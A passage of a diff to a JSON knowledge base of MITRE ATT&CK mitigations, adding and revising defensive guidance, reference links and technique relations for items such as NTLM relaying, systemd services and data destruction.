NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)\n\nUse host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)(Citation: Microsoft SMB Packet Signing)", "meta": { "external_id": "T1171", "refs": [ "https://attack.mitre.org/techniques/T1171", - "https://adsecurity.org/?p=3299" + "https://adsecurity.org/?p=3299", + "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html", + "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html", + "https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)" ] }, "related": [ @@ -2665,7 +2934,7 @@ "value": "Multi-Stage Channels Mitigation - T1104" }, { - "description": "Evaluate the security of third-party software that could be used to deploy or execute programs. Ensure that access to management systems for deployment systems is limited, monitored, and secure. Have a strict approval policy for use of deployment systems.\n\nGrant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation of Vulnerability](https://attack.mitre.org/techniques/T1068). \n\nIf the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.", + "description": "Evaluate the security of third-party software that could be used to deploy or execute programs. Ensure that access to management systems for deployment systems is limited, monitored, and secure. Have a strict approval policy for use of deployment systems.\n\nGrant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). \n\nIf the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.", "meta": { "external_id": "T1072", "refs": [ @@ -2819,6 +3088,26 @@ "uuid": "7a4d0054-53cd-476f-88af-955dddc80ee0", "value": "Drive-by Compromise Mitigation - T1189" }, + { + "description": "Mitigation of this technique with preventative controls may impact the adversary's decision process depending on what they're looking for, how they use the information, and what their objectives are. Since it may be difficult to mitigate all aspects of information that could be gathered, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.", + "meta": { + "external_id": "T1497", + "refs": [ + "https://attack.mitre.org/techniques/T1497" + ] + }, + "related": [ + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "c4585911-6ecf-47b6-aa6b-a2bae30fd3f7", + "value": "Virtualization/Sandbox Evasion Mitigation - T1497" + }, { "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", "meta": { @@ -2841,7 +3130,7 @@ "value": "Data Obfuscation Mitigation - T1001" }, { - "description": "Ensure that externally facing Web servers are patched regularly to prevent adversary access through [Exploitation of Vulnerability](https://attack.mitre.org/techniques/T1068) to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages. \n\nAudit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)", + "description": "Ensure that externally facing Web servers are patched regularly to prevent adversary access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages. \n\nAudit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)", "meta": { "external_id": "T1100", "refs": [ @@ -3119,13 +3408,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "a5de0540-73e7-4c67-96da-4143afedc7ed", "tags": [ @@ -3133,20 +3415,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "f58cd69a-e548-478b-9248-8a9af881dc34", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "d731c21e-f27d-4756-b418-0e2aaabd6d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "633baf01-6de4-4963-bb54-ff6c6357bed3", "tags": [ @@ -3154,23 +3422,45 @@ ], "type": "mitigates" }, + { + "dest-uuid": "f58cd69a-e548-478b-9248-8a9af881dc34", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, { "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" + }, + { + "dest-uuid": "d731c21e-f27d-4756-b418-0e2aaabd6d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" } ], "uuid": "8220b57e-c400-4525-bf69-f8edc6b389a8", "value": "Encrypt Network Traffic - M1009" }, { - "description": "Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Use multifactor authentication. Follow best practices for mitigating access to [Valid Accounts](https://attack.mitre.org/techniques/T1078)", + "description": "Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. \nToo strict a policy can create a denial of service condition and render environments un-usable, with all accounts being locked-out permanently. Use multifactor authentication. Follow best practices for mitigating access to [Valid Accounts](https://attack.mitre.org/techniques/T1078)\n\nRefer to NIST guidelines when creating passwords.(Citation: NIST 800-63-3)\n\nWhere possible, also enable multi factor authentication on external facing services.", "meta": { "external_id": "T1110", "refs": [ - "https://attack.mitre.org/techniques/T1110" + "https://attack.mitre.org/techniques/T1110", + "https://pages.nist.gov/800-63-3/sp800-63b.html" ] }, "related": [ @@ -3362,6 +3652,26 @@ "uuid": "2d704e56-e689-4011-b989-bf4e025a8727", "value": "Plist Modification Mitigation - T1150" }, + { + "description": "The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. Limit user access to system utilities such as systemctl to only users who have a legitimate need. Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services. Additionally, the installation of software commonly adds and changes systemd service unit files. Restrict software installation to trusted repositories only and be cautious of orphaned software packages. Utilize malicious code protection and application whitelisting to mitigate the ability of malware to create or modify systemd services. ", + "meta": { + "external_id": "T1501", + "refs": [ + "https://attack.mitre.org/techniques/T1501" + ] + }, + "related": [ + { + "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "83130e62-bca6-4a81-bd4b-8e233bd49db6", + "value": "Systemd Service Mitigation - T1501" + }, { "description": "Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.\n\nEnsure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems. (Citation: acunetix Server Secuirty) (Citation: NIST Server Security July 2008)", "meta": { @@ -3872,6 +4182,26 @@ "uuid": "4320b080-9ae9-4541-9b8b-bcd0961dbbbd", "value": "Data Staged Mitigation - T1074" }, + { + "description": "This technique likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.", + "meta": { + "external_id": "T1480", + "refs": [ + "https://attack.mitre.org/techniques/T1480" + ] + }, + "related": [ + { + "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "c61e2da1-f51f-424c-b152-dc930d4f2e70", + "value": "Environmental Keying Mitigation - T1480" + }, { "description": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. (Citation: GDSecurity Linux injection)\n\nIdentify or block potentially malicious software that may contain process injection functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)\n\nUtilize Yama (Citation: Linux kernel Yama) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux (Citation: SELinux official), grsecurity (Citation: grsecurity official), and AppAmour (Citation: AppArmor official).", "meta": { @@ -3979,14 +4309,15 @@ "value": "Account Discovery Mitigation - T1087" }, { - "description": "Take measures to detect or prevent techniques such as [Credential Dumping](https://attack.mitre.org/techniques/T1003) or installation of keyloggers to acquire credentials through [Input Capture](https://attack.mitre.org/techniques/T1056). Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access). Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege)", + "description": "Take measures to detect or prevent techniques such as [Credential Dumping](https://attack.mitre.org/techniques/T1003) or installation of keyloggers to acquire credentials through [Input Capture](https://attack.mitre.org/techniques/T1056). Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. \n\nFollow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access) \n\nAudit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. \n\nApplications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet) When possible, applications that use SSH keys should be updated periodically and properly secured. ", "meta": { "external_id": "T1078", "refs": [ "https://attack.mitre.org/techniques/T1078", + "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach", "https://technet.microsoft.com/en-us/library/dn535501.aspx", "https://technet.microsoft.com/en-us/library/dn487450.aspx", - "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach" + "https://www.us-cert.gov/ncas/alerts/TA13-175A" ] }, "related": [ @@ -4140,7 +4471,7 @@ "value": "Email Collection Mitigation - T1114" }, { - "description": "Users need to be trained to know which programs ask for permission and why. Follow mitigation recommendations for [AppleScript](https://attack.mitre.org/techniques/T1155).", + "description": "This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to mitigate. Use user training as a way to bring awareness and raise suspicion for potentially malicious events (ex: Office documents prompting for credentials).", "meta": { "external_id": "T1141", "refs": [ @@ -4632,6 +4963,27 @@ "uuid": "6e7db820-9735-4545-bc64-039bc4ce354b", "value": "LC_MAIN Hijacking Mitigation - T1149" }, + { + "description": "Implementing best practices for websites such as defending against [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) (Citation: OWASP Top 10 2017). Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.", + "meta": { + "external_id": "T1491", + "refs": [ + "https://attack.mitre.org/techniques/T1491", + "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf" + ] + }, + "related": [ + { + "dest-uuid": "5909f20f-3c39-4795-be06-ef1ea40d350b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "5d8507c4-603e-4fe1-8a4a-b8241f58734b", + "value": "Defacement Mitigation - T1491" + }, { "description": "Since StartupItems are deprecated, preventing all users from writing to the /Library/StartupItems directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can’t be leveraged for privilege escalation.", "meta": { @@ -4827,6 +5179,111 @@ "uuid": "797312d4-8a84-4daf-9c56-57da4133c322", "value": "Trusted Relationship Mitigation - T1199" }, + { + "description": "Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification. Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities. ", + "meta": { + "external_id": "T1495", + "refs": [ + "https://attack.mitre.org/techniques/T1495" + ] + }, + "related": [ + { + "dest-uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "70886857-0f19-4caa-b081-548354a8a994", + "value": "Firmware Corruption Mitigation - T1495" + }, + { + "description": "Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)", + "meta": { + "external_id": "T1496", + "refs": [ + "https://attack.mitre.org/techniques/T1496", + "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "https://technet.microsoft.com/en-us/library/ee791851.aspx" + ] + }, + "related": [ + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "46acc565-11aa-40ba-b629-33ba0ab9b07b", + "value": "Resource Hijacking Mitigation - T1496" + }, + { + "description": "Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.\n\nIdentify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)", + "meta": { + "external_id": "T1488", + "refs": [ + "https://attack.mitre.org/techniques/T1488", + "https://www.ready.gov/business/implementation/IT", + "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "https://technet.microsoft.com/en-us/library/ee791851.aspx" + ] + }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "0b3ee33e-430b-476f-9525-72d120c90f8d", + "value": "Data Destruction Mitigation - T1488" + }, + { + "description": "Ensure proper process, registry, and file permissions are in place to inhibit adversaries from disabling or interfering with critical services. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Harden systems used to serve critical network, business, and communications functions. Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.", + "meta": { + "external_id": "T1489", + "refs": [ + "https://attack.mitre.org/techniques/T1489" + ] + }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + } + ], + "uuid": "417fed8c-bd76-48b5-90a2-a88882a95241", + "value": "Service Stop Mitigation - T1489" + }, { "description": "Limit privileges of user accounts so only authorized users can edit the rc.common file.", "meta": { @@ -4848,7 +5305,7 @@ "value": "Rc.common Mitigation - T1163" }, { - "description": "Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuess by adversaries.", + "description": "Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.", "meta": { "external_id": "T1121", "refs": [ @@ -4883,69 +5340,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "f1c3d071-0c24-483d-aca0-e8b8496ce468", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "b332a960-3c04-495a-827f-f17a5daed3a6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "88932a8c-3a17-406f-9431-1da3ff19f6d6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9", "tags": [ @@ -4953,34 +5347,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "a0464539-e1b7-4455-a355-12495987c300", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "ef771e03-e080-43b4-a619-ac6f84899884", "tags": [ @@ -4989,7 +5355,21 @@ "type": "mitigates" }, { - "dest-uuid": "46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "dest-uuid": "a0464539-e1b7-4455-a355-12495987c300", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "f1c3d071-0c24-483d-aca0-e8b8496ce468", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5001,6 +5381,83 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" + }, + { + "dest-uuid": "b332a960-3c04-495a-827f-f17a5daed3a6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "88932a8c-3a17-406f-9431-1da3ff19f6d6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" } ], "uuid": "bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", @@ -5023,14 +5480,14 @@ "type": "mitigates" }, { - "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", + "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" }, { - "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", + "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5057,21 +5514,35 @@ "type": "mitigates" }, { - "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" }, { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" }, { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5084,6 +5555,48 @@ ], "type": "mitigates" }, + { + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "d731c21e-f27d-4756-b418-0e2aaabd6d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, { "dest-uuid": "ef771e03-e080-43b4-a619-ac6f84899884", "tags": [ @@ -5091,6 +5604,104 @@ ], "type": "mitigates" }, + { + "dest-uuid": "8f142a25-f6c3-4520-bd50-2ae3ab50ed3e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "8e27551a-5080-4148-a584-c64348212e4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "d9db3d46-66ca-44b4-9daa-1ef97cb7465a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "77e30eee-fd48-40b4-99ec-73e97c158b58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, { "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", "tags": [ @@ -5105,55 +5716,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - 